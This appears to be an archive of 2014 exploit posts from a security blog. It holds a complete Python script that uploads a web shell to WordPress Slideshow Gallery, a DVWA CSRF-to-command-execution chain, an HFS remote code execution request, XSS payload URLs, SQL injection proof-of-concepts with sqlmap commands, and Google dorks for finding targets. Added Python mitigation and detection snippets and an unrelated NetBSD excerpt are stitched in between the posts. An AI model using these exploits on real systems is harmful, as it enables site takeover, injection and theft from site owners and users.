
18Sep/140

WordPress WP-Ban 1.62 Bypass

Details
================
Software: WP-Ban
Version: 1.62
Homepage: http://wordpress.org/plugins/wp-ban/
Advisory report: https://security.dxw.com/advisories/vulnerability-in-wp-ban-allows-visitors-to-bypass-the-ip-blacklist-in-some-configurations/
CVE: CVE-2014-6230
CVSS: 5 (Medium; AV:N/AC:L/Au:N/C:P/I:N/A:N)
 
Description
================
Vulnerability in WP-Ban allows visitors to bypass the IP blacklist in some configurations
 
Vulnerability
================
This plugin allows blacklisting visitors based on their IP address; however, it takes the IP address from the X-Forwarded-For header whenever one is present.
Not all web server configurations strip or replace X-Forwarded-For headers, in which case the IP ban can be bypassed simply by sending this header. The plugin therefore only works in certain configurations, but does not warn admins of this fact.
 
Proof of concept
================
 
Visit http://localhost/wp-admin/admin.php?page=wp-ban/ban-options.php
Set "Banned IPs" to "127.0.0.1"
Execute "curl http://localhost/" and see the "You Are Banned" message
Execute "curl http://localhost/ -H 'X-Forwarded-For: 999.999.999.999'" and see that it displays the page
 
Note that this will not work if your Web server sets or strips X-Forwarded-For headers.
(To remove the IP blacklist run this SQL: "delete from wp_options where option_name='banned_ips';")
 
Mitigations
================
Upgrade to version 1.6.4 or later.
If a reverse-proxy is used, check the “I am using a reverse proxy” box in the plugin settings, and ensure that X-Forwarded-For headers are being set even if the request already contains an X-Forwarded-For header.
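As an added example (not the plugin's code), the following Python models the two ways of resolving a client address described above: the naive one that trusts any X-Forwarded-For header, and a hardened one that honours the header only when the request arrives from a listed reverse proxy and then reads the chain from the right. The blacklist value and the sample requests are taken from the PoC; the function names and the trusted-proxy address are assumptions.

```python
import ipaddress

# Constructed blacklist, matching the "Banned IPs" value used in the advisory's PoC.
BANNED_IPS = {"127.0.0.1"}


def client_ip_naive(remote_addr, headers):
    """Model of the behaviour the advisory describes (not the plugin's own code):
    whenever an X-Forwarded-For header is present its first entry is taken as
    the client address, whoever supplied it."""
    xff = headers.get("X-Forwarded-For")
    if xff:
        return xff.split(",")[0].strip()
    return remote_addr


def client_ip_hardened(remote_addr, headers, trusted_proxies):
    """Honour X-Forwarded-For only when the TCP peer is a trusted reverse proxy,
    and walk the chain from the right so that any prefix the client injected
    before the proxy appended the real address is ignored.
    Returns None when no trustworthy address can be determined."""
    if remote_addr not in trusted_proxies:
        return remote_addr  # direct connection: the header is attacker-controlled
    xff = headers.get("X-Forwarded-For", "")
    hops = [h.strip() for h in xff.split(",") if h.strip()]
    for hop in reversed(hops):
        if hop in trusted_proxies:
            continue  # an upstream proxy of ours, keep walking left
        try:
            ipaddress.ip_address(hop)  # rejects junk such as 999.999.999.999
        except ValueError:
            return None
        return hop
    return None  # the proxy sent no usable chain; fail closed below


def is_banned(ip):
    """Fail closed: an undeterminable address is treated as banned."""
    return ip is None or ip in BANNED_IPS


def ban_decision(remote_addr, headers, trusted_proxies=frozenset()):
    """Return (naive_result, hardened_result) for one request so the bypass
    and its mitigation can be compared side by side."""
    return (is_banned(client_ip_naive(remote_addr, headers)),
            is_banned(client_ip_hardened(remote_addr, headers, trusted_proxies)))


if __name__ == "__main__":
    # Constructed requests: the advisory's curl PoC sent straight to the web server...
    print(ban_decision("127.0.0.1", {"X-Forwarded-For": "999.999.999.999"}))
    # ...and the same header arriving via a trusted proxy that appended the real peer.
    print(ban_decision("10.0.0.2", {"X-Forwarded-For": "999.999.999.999, 127.0.0.1"}, {"10.0.0.2"}))
```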
 
Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
 
Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.
 
This vulnerability will be published if we do not receive a response to this report within 14 days.
 
Timeline
================
 
2014-08-27: Discovered
2014-09-04: Reported to vendor by email
2014-09-04: Requested CVE
2014-09-04: Vendor responded
2014-09-17: Vendor reported a fixed version released
2014-09-17: Published
 
 
 
Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.


16Sep/140

DVWA Cross Site Request Forgery

<!-- There are multiple CSRF issues in DVWA. Attackers can use these CSRF exploits to
  first reset the victim's DVWA database, then make the victim log in using the default credentials restored by the reset,
  next craft another CSRF to change the challenge level to low to make exploitation more likely,
  then use these to craft a command execution CSRF and possibly get a shell. :) 
 
  *This PoC will open calculator as a demo execution in approximately 5 seconds.*
 
  The attacker just needs to know you have DVWA for this to work.
 
  Paulos Yibelo and Tabor N. Shiferaw  2014
 
  -->
 
  <script src='https://ajax.googleapis.com/ajax/libs/jquery/1.8.0/jquery.min.js' type='text/javascript'>
  </script>
  <div id='loader'></div>
 
  <script>
 
  //document.getElementById("loader").innerHTML = 'Loading...';
 
  var one = {"create_db":'whatever'};
  var two = {"username":"admin","password":"password","Login":"Login"};
  var three = {"security":"low","seclev_submit":"Submit"};
 
  //windows opens calculator; change this to whatever your desire 
  var four = {"ip":"127.0.0.1 && notepad && calc","submit":"submit"};
 
  //linux
  //var four = {"ip":"127.0.0.1;netcat -l 15.11.11.x -p 4444","submit":"submit"};
 
  /*
  *step 1
  *Reset the Database
  */
  function start_exploit()
  {
    $("#loader").html("Loading...");
    $.ajax({
      url:"http://localhost/dvwa/setup.php",
      type:"POST",
      data:one,
      success:
          function(x){
            dvwaLogin();
          }
 
    });
  }
  /*
  *step 2
  *login using default new password 
  */
  function dvwaLogin()
  {
    $.ajax({
      url:"http://localhost/dvwa/login.php",
      type:"POST",
      data:two,
      success:function(x){
        levelChanger();
      }
    });
  }
  /*
  *step 3
  *set level to low
  */
  function levelChanger(){
    $.ajax({
      url:"http://localhost/dvwa/security.php",
      type:"POST",
      data:three,
      success:function(x){
        commandExecution();
      }
    });
  }
 
  /*
  *step 4
  *execute command
  */
  function commandExecution(){
    $.ajax(
        {
          url:"http://localhost/dvwa/vulnerabilities/exec/index.php",
          type:"POST",
          data:four,
          success:function(x){
            //document.getElementById("loader").innerHTML = "Executed";
            $("#loader").text("Loaded");
          }
        }
      );
  }
 
 
  start_exploit();
  </script>
 
<!-- check out http://paulosyibelo.blogspot.com/2014/09/dvwa-unintended-security-issues.html for more -->


16Sep/140

HttpFileServer 2.3.x Remote Command Execution

Affected software: http://sourceforge.net/projects/hfs/
Version : 2.3x
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 11-09-2014
# Remote: Yes
# Exploit Author: Daniele Linguaglossa
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
 
The issue exists due to a poor regex in the file ParserLib.pas:
 
 
function findMacroMarker(s:string; ofs:integer=1):integer;
begin result:=reMatch(s, '\{[.:]|[.:]\}|\|', 'm!', ofs) end;
 
 
The regex does not handle a null byte, so a request to
 
http://localhost:80/search=%00{.exec|cmd.}
 
stops the regex from parsing the macro marker; the macro is then executed anyway, resulting in remote code injection.
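An added example, not from the advisory or from HFS: a Python model of the behaviour described above, assuming that the regex engine behind findMacroMarker stopped at the first NUL as it would on a C string. It puts that model beside a length-aware search and a small detection check for this request shape; the function names are assumptions, the pattern and the PoC value are the page's own.

```python
import re
from urllib.parse import unquote

# Same three alternatives as the Pascal findMacroMarker above:
# "{." or "{:", ".}" or ":}", and a bare "|".
MACRO_MARKER = re.compile(r"\{[.:]|[.:]\}|\|")


def find_macro_marker_nul_terminated(s, ofs=0):
    """Model of the vulnerable behaviour (assumption): the regex engine treated
    its input as a NUL-terminated buffer, so everything after the first '\\0'
    is invisible to it. Returns the 0-based offset of the first marker or -1
    (the Pascal original is 1-based and returns 0 for "not found")."""
    visible = s.split("\x00", 1)[0]
    m = MACRO_MARKER.search(visible, ofs)
    return m.start() if m else -1


def find_macro_marker_fixed(s, ofs=0):
    """Length-aware search: a NUL is an ordinary character and hides nothing."""
    m = MACRO_MARKER.search(s, ofs)
    return m.start() if m else -1


def contains_macro_syntax(s, finder=find_macro_marker_fixed):
    return finder(s) != -1


def request_is_suspicious(raw_param):
    """Detection heuristic (constructed for this example): a URL-decoded
    parameter that carries a NUL byte together with macro syntax is the
    signature of the bypass shown above."""
    value = unquote(raw_param)
    return "\x00" in value and contains_macro_syntax(value)


if __name__ == "__main__":
    poc = unquote("%00{.exec|cmd.}")  # the advisory's search value, decoded
    print(find_macro_marker_nul_terminated(poc))  # -1: the guard sees no macro
    print(find_macro_marker_fixed(poc))           # 1: the macro is really there
```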


16Sep/140

WordPress Slideshow Gallery 1.4.6 Shell Upload

#!/usr/bin/env python
#
# WordPress Slideshow Gallery 1.4.6 Shell Upload Exploit
#
# WordPress Slideshow Gallery plugin version 1.4.6 suffers from a remote shell upload vulnerability (CVE-2014-5460)
#
# Vulnerability discovered by: Jesus Ramirez Pichardo - http://whitexploit.blogspot.mx/
#
# Exploit written by: Claudio Viviani - info@homelab.it - http://www.homelab.it
#
#
# Disclaimer:
#
# This exploit is intended for educational purposes only and the author
# can not be held liable for any kind of damages done whatsoever to your machine,
# or damages caused by some other,creative application of this exploit.
# In any case you disagree with the above statement,stop here.
#
#
# Requirements:
#
# 1) Enabled user management slide
# 2) python's httplib2 lib
#    Installation: pip install httplib2
#
# Usage:
#
# python wp_gallery_slideshow_146_suv.py -t http[s]://localhost -u user -p pwd -f sh33l.php
# python wp_gallery_slideshow_146_suv.py -t http[s]://localhost/wordpress -u user -p pwd -f sh33l.php
# python wp_gallery_slideshow_146_suv.py -t http[s]://localhost:80|443 -u user -p pwd -f sh33l.php
#
# Backdoor Location:
#
# http://localhost/wp-content/uploads/slideshow-gallery/sh33l.php
#
# Tested on Wordpress 3.6, 3.7, 3.8, 3.9, 4.0
#
 
# http connection
import urllib, httplib2, sys, mimetypes
# Args management
import optparse
# Error management
import socket, httplib
# file management
import os, os.path
 
# Check url
def checkurl(url):
    if url[:8] != "https://" and url[:7] != "http://":
        print('[X] You must insert http:// or https:// protocol')
        sys.exit(1)
    else:
        return url
 
# Check if file exists and has readable
def checkfile(file):
    # Reject the file if it is missing OR unreadable (the original "and" let an
    # unreadable existing file through and crashed later in open())
    if not os.path.isfile(file) or not os.access(file, os.R_OK):
        print '[X] '+file+' file is missing or not readable'
        sys.exit(1)
    else:
        return file
# Get file's mimetype
def get_content_type(filename):
    return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
 
# Create multipart header
def create_body_sh3ll_upl04d(payloadname):
 
   getfields = dict()
   getfields['Slide[id]'] = ''
   getfields['Slide[order]'] = ''
   getfields['Slide[title]'] = 'h0m3l4b1t'
   getfields['Slide[description]'] = 'h0m3l4b1t'
   getfields['Slide[showinfo]'] = 'both'
   getfields['Slide[iopacity]'] = '70'
   getfields['Slide[type]'] = 'file'
   getfields['Slide[image_url]'] = ''
   getfields['Slide[uselink]'] = 'N'
   getfields['Slide[link]'] = ''
   getfields['Slide[linktarget]'] = 'self'
 
   payloadcontent = open(payloadname).read()
 
   LIMIT = '----------lImIt_of_THE_fIle_eW_$'
   CRLF = '\r\n'
 
   L = []
   for (key, value) in getfields.items():
      L.append('--' + LIMIT)
      L.append('Content-Disposition: form-data; name="%s"' % key)
      L.append('')
      L.append(value)
 
   L.append('--' + LIMIT)
   L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('image_file', payloadname))
   L.append('Content-Type: %s' % get_content_type(payloadname))
   L.append('')
   L.append(payloadcontent)
   L.append('--' + LIMIT + '--')
   L.append('')
   body = CRLF.join(L)
   return body
 
banner = """
 
 $$$$$$\  $$\ $$\       $$\                     $$\
$$  __$$\ $$ |\__|      $$ |                    $$ |
$$ /  \__|$$ |$$\  $$$$$$$ | $$$$$$\   $$$$$$$\ $$$$$$$\   $$$$$$\  $$\  $$\  $$\
\$$$$$$\  $$ |$$ |$$  __$$ |$$  __$$\ $$  _____|$$  __$$\ $$  __$$\ $$ | $$ | $$ |
 \____$$\ $$ |$$ |$$ /  $$ |$$$$$$$$ |\$$$$$$\  $$ |  $$ |$$ /  $$ |$$ | $$ | $$ |
$$\   $$ |$$ |$$ |$$ |  $$ |$$   ____| \____$$\ $$ |  $$ |$$ |  $$ |$$ | $$ | $$ |
\$$$$$$  |$$ |$$ |\$$$$$$$ |\$$$$$$$\ $$$$$$$  |$$ |  $$ |\$$$$$$  |\$$$$$\$$$$  |
 \______/ \__|\__| \_______| \_______|\_______/ \__|  \__| \______/  \_____\____/
 
 
 
             $$$$$$\            $$\ $$\                                       $$\ $$\   $$\     $$$$$$\
            $$  __$$\           $$ |$$ |                                    $$$$ |$$ |  $$ |   $$  __$$\
            $$ /  \__| $$$$$$\  $$ |$$ | $$$$$$\   $$$$$$\  $$\   $$\       \_$$ |$$ |  $$ |   $$ /  \__|
            $$ |$$$$\  \____$$\ $$ |$$ |$$  __$$\ $$  __$$\ $$ |  $$ |        $$ |$$$$$$$$ |   $$$$$$$\
            $$ |\_$$ | $$$$$$$ |$$ |$$ |$$$$$$$$ |$$ |  \__|$$ |  $$ |        $$ |\_____$$ |   $$  __$$\
            $$ |  $$ |$$  __$$ |$$ |$$ |$$   ____|$$ |      $$ |  $$ |        $$ |      $$ |   $$ /  $$ |
            \$$$$$$  |\$$$$$$$ |$$ |$$ |\$$$$$$$\ $$ |      \$$$$$$$ |      $$$$$$\ $$\ $$ |$$\ $$$$$$  |
             \______/  \_______|\__|\__| \_______|\__|       \____$$ |      \______|\__|\__|\__|\______/
                                                            $$\   $$ |
                                                            \$$$$$$  |
                                                             \______/
 
                                                                   W0rdpr3ss Sl1d3sh04w G4ll3ry 1.4.6 Sh3ll Upl04d Vuln.
 
                          =============================================
                          - Release date: 2014-08-28
                          - Discovered by: Jesus Ramirez Pichardo
                          - CVE: 2014-5460
                          =============================================
 
                                          Written by:
 
                                        Claudio Viviani
 
                                     http://www.homelab.it
 
                                        info@homelab.it
                                     homelabit@protonmail.ch
 
                                https://www.facebook.com/homelabit
                                https://twitter.com/homelabit
                                https://plus.google.com/+HomelabIt1/
                      https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""
 
commandList = optparse.OptionParser('usage: %prog -t URL -u USER -p PASSWORD -f FILENAME.PHP [--timeout sec]')
commandList.add_option('-t', '--target', action="store",
                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                  )
commandList.add_option('-f', '--file', action="store",
                  help="Insert file name, ex: shell.php",
                  )
commandList.add_option('-u', '--user', action="store",
                  help="Insert Username",
                  )
commandList.add_option('-p', '--password', action="store",
                  help="Insert Password",
                  )
commandList.add_option('--timeout', action="store", default=10, type="int",
                  help="[Timeout Value] - Default 10",
                  )
 
options, remainder = commandList.parse_args()
 
# Check args
if not options.target or not options.user or not options.password or not options.file:
    print(banner)
    commandList.print_help()
    sys.exit(1)
 
payloadname = checkfile(options.file)
host = checkurl(options.target)
username = options.user
pwd = options.password
timeout = options.timeout
 
print(banner)
 
url_login_wp = host+'/wp-login.php'
url_admin_slideshow = host+'/wp-admin/admin.php?page=slideshow-slides&method=save'
 
content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'
 
http = httplib2.Http(disable_ssl_certificate_validation=True, timeout=timeout)
 
# Wordpress login POST Data
body = { 'log':username,
         'pwd':pwd,
         'wp-submit':'Login',
         'testcookie':'1' }
# Wordpress login headers with Cookie
headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
            'Content-type': 'application/x-www-form-urlencoded',
            'Cookie': 'wordpress_test_cookie=WP+Cookie+check' }
try:
    response, content = http.request(url_login_wp, 'POST', headers=headers, body=urllib.urlencode(body))
    if len(response['set-cookie'].split(" ")) < 4:
    #if 'httponly' in response['set-cookie'].split(" ")[-1]:
        print '[X] Wrong username or password'
        sys.exit()
    else:
        print '[+] Username & password ACCEPTED!\n'
 
        # Create cookie for admin panel
        if 'secure' in response['set-cookie']:
            c00k13 = response['set-cookie'].split(" ")[6]+' '+response['set-cookie'].split(" ")[0]+' '+response['set-cookie'].split(" ")[10]
        else:
            c00k13 = response['set-cookie'].split(" ")[5]+' '+response['set-cookie'].split(" ")[0]+' '+response['set-cookie'].split(" ")[8]
 
        bodyupload = create_body_sh3ll_upl04d(payloadname)
 
        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
                   'Cookie': c00k13,
                   'content-type': content_type,
                   'content-length': str(len(bodyupload)) }
        response, content = http.request(url_admin_slideshow, 'POST', headers=headers, body=bodyupload)
 
        if 'admin.php?page=slideshow-slides&Galleryupdated=true&Gallerymessage=Slide+has+been+saved' in content:
            print '[!] Shell Uploaded!'
            print '[+] Check url: '+host+'/wp-content/uploads/slideshow-gallery/'+payloadname.lower()+' (lowercase!!!!)'
        else:
            print '[X] The user can not upload files or plugin fixed :((('
 
except socket.timeout:
    print('[X] Connection Timeout')
    sys.exit(1)
except socket.error:
    print('[X] Connection Refused')
    sys.exit(1)
except httplib.ResponseNotReady:
    print('[X] Server Not Responding')
    sys.exit(1)
except httplib2.ServerNotFoundError:
    print('[X] Server Not Found')
    sys.exit(1)
except httplib2.HttpLib2Error:
    print('[X] Connection Error!!')
    sys.exit(1)
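As an added detection example (not part of the exploit or of the plugin), the following Python correlates web-server access log lines for the request pattern this exploit produces: a POST to the slide-save endpoint followed by a request for a script under the gallery's upload directory. The log lines are constructed; the save path and upload directory are the ones used in the exploit above.

```python
import re

# Constructed Apache combined-format lines modelled on the exploit's request
# sequence (login, slide "save" POST, then a fetch of the uploaded .php file).
SAMPLE_LOG = """\
203.0.113.5 - - [15/Sep/2014:10:01:02 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.5 - - [15/Sep/2014:10:01:03 +0000] "POST /wp-admin/admin.php?page=slideshow-slides&method=save HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.5 - - [15/Sep/2014:10:01:05 +0000] "GET /wp-content/uploads/slideshow-gallery/sh33l.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [15/Sep/2014:10:02:00 +0000] "GET /wp-content/uploads/slideshow-gallery/photo.jpg HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
198.51.100.7 - - [15/Sep/2014:10:02:09 +0000] "GET /wp-content/uploads/slideshow-gallery/old.php HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
SAVE_PATH = "/wp-admin/admin.php?page=slideshow-slides&method=save"
# Any server-side script under the gallery's upload directory (the plugin
# lower-cases the stored file name, hence the case-insensitive match).
UPLOAD_SCRIPT = re.compile(
    r"^/wp-content/uploads/slideshow-gallery/[^/?]+\.(php\d?|phtml|phar)(\?|$)",
    re.IGNORECASE)


def parse_line(line):
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def find_upload_abuse(log_text):
    """Correlate per client IP: a POST to the slide-save endpoint followed by a
    successful (2xx) request for a script in the upload directory.
    Returns a list of (ip, path) findings in log order."""
    saved_from = set()
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["path"] == SAVE_PATH:
            saved_from.add(rec["ip"])
        elif (rec["method"] == "GET" and UPLOAD_SCRIPT.match(rec["path"])
              and rec["ip"] in saved_from and rec["status"].startswith("2")):
            findings.append((rec["ip"], rec["path"]))
    return findings


def script_requests_in_uploads(log_text):
    """Broader signal: every request for a script under the upload directory,
    whatever the status. A healthy site should never serve scripts from there."""
    return [(r["ip"], r["path"], r["status"])
            for r in map(parse_line, log_text.splitlines())
            if r and UPLOAD_SCRIPT.match(r["path"])]


if __name__ == "__main__":
    for ip, path in find_upload_abuse(SAMPLE_LOG):
        print("possible web shell upload from %s: %s" % (ip, path))
```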


15Sep/140

WordPress Photo Album Plus 5.4.4 Cross Site Scripting

WP Photo Album Plus Security Vulnerabilities
 
Author: Milhouse 
Download: https://wordpress.org/plugins/wp-photo-album-plus/
Home Page: http://wppa.opajaap.nl/
Google dork: inurl:wp-content/plugins/wp-photo-album-plus
 
Set up:
Wordpress Version: 3.9.1, 3.9.2
WP Photo Album Plus version: 5.4.4, 5.4.3
Client browsers: FireFox 31, Internet Explorer 8-11
 
Issue number 1: A Cross-Site Scripting (reflective) vulnerability.
Details:
The plugin echoes the value of the HTTP header "User-Agent" back to the client browser, which allows unsanitised JavaScript to be injected.
 
Severity: Low
 
Proof of Concept (POC):
Request:
GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) 47b5a--><script>alert(1)</script>0aa96
Accept-Encoding: gzip, deflate
Host: <vulnerablesite.example>
DNT: 1
Proxy-Connection: Keep-Alive
Pragma: no-cache
 
Issue number 2: A Cross-Site Scripting (reflective) vulnerability.
 
Details:
The value of the wppa-album parameter is inserted into a JavaScript string. A payload supplied in the wppa-album parameter is echoed back unmodified to the client browser.
 
Severity: High
 
Proof of Concept (POC):
http://vulnerablesite.example/?page_id=109&wppa-album=0178d4<%2fscript><script>alert(1)<%2fscript>75f6e&wppa-cover=0&wppa-occur=1&wppa-tag=
 
Issue number 3: Cross-Site Scripting (Reflective) Vulnerability. 
 
Severity: High
 
Details:
The supplied value of the request parameter wppa-lasten is vulnerable to cross-site scripting. By using an event handler such as "onmouseover" it is possible to insert arbitrary JavaScript into the page.
 
Proof of concept (POC):
http://vulnerablesite.example/?wppa-occur=1&wppa-lasten=102dbdd"%20onmouseover%3dalert(1)%20fd679&page_id=10&wppa-album=0&wppa-photo=2
 
Issue number 4: Cross-Site Scripting (Reflective) vulnerability
 
Severity: High
 
Details:
The value supplied to the wppa-searchstring parameter is copied into the value of an HTML tag attribute. It is possible to use a style attribute to introduce arbitrary JavaScript into the application's response.
 
Proof of Concept (POC): http://vulnerablesite.example/?page_id=110&wppa-search-submit=wppa-search-submit%3dSearch&wppa-searchstring=cd84d"style%3d"behavior%3aurl(%23default%23time2)"onbegin%3d"alert(1)"3b512b44ea8&wppa-searchroot=
 
Issue number 5: Cross-Site Scripting (reflective) 
 
Severity: High
 
Details:
This is similar to issue three. The value supplied to the wppa-topten parameter is inserted into the value of an HTML tag attribute. By using an event handler such as "onmouseover" it is possible to inject arbitrary JavaScript into the page.
 
Proof of Concept:
http://vulnerablesite.example/?wppa-occur=1&wppa-topten=10eb700"%20onmouseover%3dalert(1)%203c53f&&page_id=12&wppa-album=0&wppa-photo=2
 
Issue number 6: Cross-Site Scripting (Reflective) Vulnerability.
 
Severity: High
 
Details:
This is similar to issue number four. The value supplied to the s (search) parameter is copied into the value of an HTML tag attribute. It is possible to use a style attribute to introduce arbitrary JavaScript into the application's response. The plugin appears to use the value of s (search) in the same place as the value of wppa-searchstring.
 
Proof of Concept: http://vulnerablesite.example/?s=7d0ba"style%3d"behavior%3aurl(%23default%23time2)"onbegin%3d"alert(1)"3924b
 
Resolution: 
Developer fixed the issues immediately after disclosure. Update the plugin to the latest version.


15Sep/140

Joomla Spider Form Maker 4.3 SQL Injection

######################
 
# Exploit Title : Joomla Spider Form Maker <= 4.3 SQL Injection
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://web-dorado.com/
 
# Software Link : http://web-dorado.com/products/joomla-form.html
 
# Dork Google: inurl:com_formmaker
 
 
# Date : 2014-09-07
 
# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox
 
######################
 
# PoC Exploit:
 
http://localhost/index.php?option=com_formmaker&view=formmaker&id=[SQLi]
 
 
"id" variable is not sanitized.
 
 
######################
 
# Vulnerability Disclosure Timeline:
 
2014-09-07:  Discovered vulnerability
2014-09-09:  Vendor Notification
2014-09-10:  Vendor Response/Feedback
2014-09-10:  Vendor Fix/Patch
2014-09-10:  Public Disclosure
 
#####################
 
Discovered By : Claudio Viviani
                http://www.homelab.it
 
                info@homelab.it
                homelabit@protonmail.ch
 
                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
 
#####################


10Sep/140

NetBSD


NetBSD is a highly portable, free Unix-like operating system derived from BSD UNIX, available for many platforms, from 64-bit Alpha servers down to handheld devices.
Its clean design and advanced features make it suitable for both production and research environments. It is fully available in source form and comes with a rich set of applications.

The origins of NetBSD

The first version of NetBSD (0.8) dates back to August 1993 and derives from the 4.3BSD NET/2 operating system, a version of Unix developed at the University of California, Berkeley (BSD, Berkeley Software Distribution), and from 386BSD, the first port to Intel 386 systems. Changes from 4.4BSD Lite, the last official release of the Berkeley development group before it disbanded, were integrated later. The BSD branch of Unix has been of great importance in the history of this operating system, contributing numerous innovations that are now part of every Unix system (the vi editor, the C shell, job control, the Berkeley fast file system and the integration of TCP/IP, to name a few). That tradition of development and research survives today in the BSD systems (both free and commercial) and, in particular, in NetBSD.

Features of NetBSD

NetBSD runs on a wide range of hardware platforms and is very portable. NetBSD ships with the source code of the entire operating system for every supported platform. Without going into excessive detail, for which the official NetBSD project site is the reference, the fundamental characteristics of this operating system are the following:

Extreme portability (over 50 supported platforms)
Code quality and correctness
Standards compliance
Research and innovation

The features just mentioned also bring indirect benefits. For example, someone who works on a single platform might not care about portability; in reality, however, portability is closely tied to code quality: it would not be possible to support all these platforms if the code were not well written and well organised. The attention paid to the architecture and quality of the system is repaid by the great potential of its code and the quality of its drivers, and so it matters to every user.

One of the system's characteristics is that it does not settle for partial implementations: "if it has to be done, it has to be done well"; the computing landscape already sadly abounds with examples of over-developed, bug-ridden programs and operating systems that collapse under their own weight.

Who NetBSD is for

According to the NetBSD site, its audience is professionals, enthusiasts and researchers who want a stable system that puts quality first. But anyone who wants to learn Unix will also find NetBSD the ideal platform, especially because of its adherence to standards (one of the project's goals), and, finally, anyone who needs a Unix platform available on a wide variety of machines could not find a better ally than NetBSD.

Another interesting feature of NetBSD is the ability to reuse hardware considered obsolete by most operating systems, which makes it an excellent platform for learning Unix. As if to say: "there is no need to buy new hardware to get your own version of Unix running: you can happily reuse the old Mac IIcx you have in the attic".

Source: http://it.wikipedia.org/wiki/NetBSD


10Sep/140

WordPress Plugin Vulnerability Dump – Part 2

More vulnerabilities in poorly coded plugins for y'all.
 
Ninja Forms v2.77 - Authorization bypass (regular users can delete forms, etc)
Contact Form v3.83 - Email header injection
WP to Twitter v2.9.3 - Authorization bypass (regular users can tweet to the admin's twitter account)
Xhanch - My Twitter v2.7.7 - CSRF (create and delete tweets)
TinyMCE Advanced v4.1 - (insignificant) CSRF
W3 Total Cache v0.9.4 - (minor) CSRF
WordPress Download Manager v2.6.92 - Authorization bypass (regular users can upload/delete arbitrary files, yes, even php files)
Wordfence Security v5.2.2 - Stored XSS
 
Details and POCs located: https://vexatioustendencies.com/wordpress-plugin-vulnerability-dump-part-2/
 
More to follow.
 
-Voxel () Night


9Sep/140

WordPress Spider Facebook 1.0.8 SQL Injection

######################
# Exploit Title : Wordpress Spider Facebook 1.0.8 Authenticated SQL Injection
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://web-dorado.com/
 
# Software Link : http://downloads.wordpress.org/plugin/spider-facebook.1.0.8.zip
 
# Date : 2014-08-25
 
# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox
#             Linux / sqlmap 1.0-dev-5b2ded0
 
######################
 
# Location :  
http://localhost/wp-content/plugins/plugins/spider-facebook/facebook.php
 
######################
 
# Vulnerable code :
 
function Spider_Facebook_manage()
{
        require_once("facebook_manager.php");
        require_once("facbook_manager.html.php");
        if(!function_exists ('print_html_nav' ))
        require_once("nav_function/nav_html_func.php");
        global $wpdb;
        if(isset($_GET['id']))
        {
        $id=$_GET['id'];
        }
        else
        {
                $id=0;
        }
 
 
######################
 
# PoC Exploit:
 
http://10.0.0.67/wordpress/wp-admin/admin.php?page=Spider_Facebook_manage&task=Spider_Facebook_edit&id=1 and 1=2
 
 
# Exploit Code via sqlmap:
 
sqlmap --cookie="INSERT_WORDPRESS_COOKIE_HERE" -u "http://10.0.0.67/wordpress/wp-admin/admin.php?page=Spider_Facebook_manage&task=Spider_Facebook_edit&id=1" -p id --dbms=mysql
 
[21:27:40] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
...
...
...
---
Place: GET
Parameter: id
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: page=Spider_Facebook_manage&task=Spider_Facebook_edit&id=1 AND SLEEP(5)
 
---
 
 
# PoC Video:
 
https://www.youtube.com/watch?v=CcuvHLWnjZo
 
######################
 
# Vulnerability Disclosure Timeline:
 
2014-08-25:  Discovered vulnerability
2014-09-04:  Vendor Notification (Web Customers Service Form)
2014-08-05:  Vendor Response/Feedback 
2014-08-05:  Vendor Fix/Patch 
2014-08-05:  Public Disclosure
 
#####################
 
Discovered By : Claudio Viviani
                http://www.homelab.it
 
                info@homelab.it
                homelabit@protonmail.ch
 
                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
 
#####################
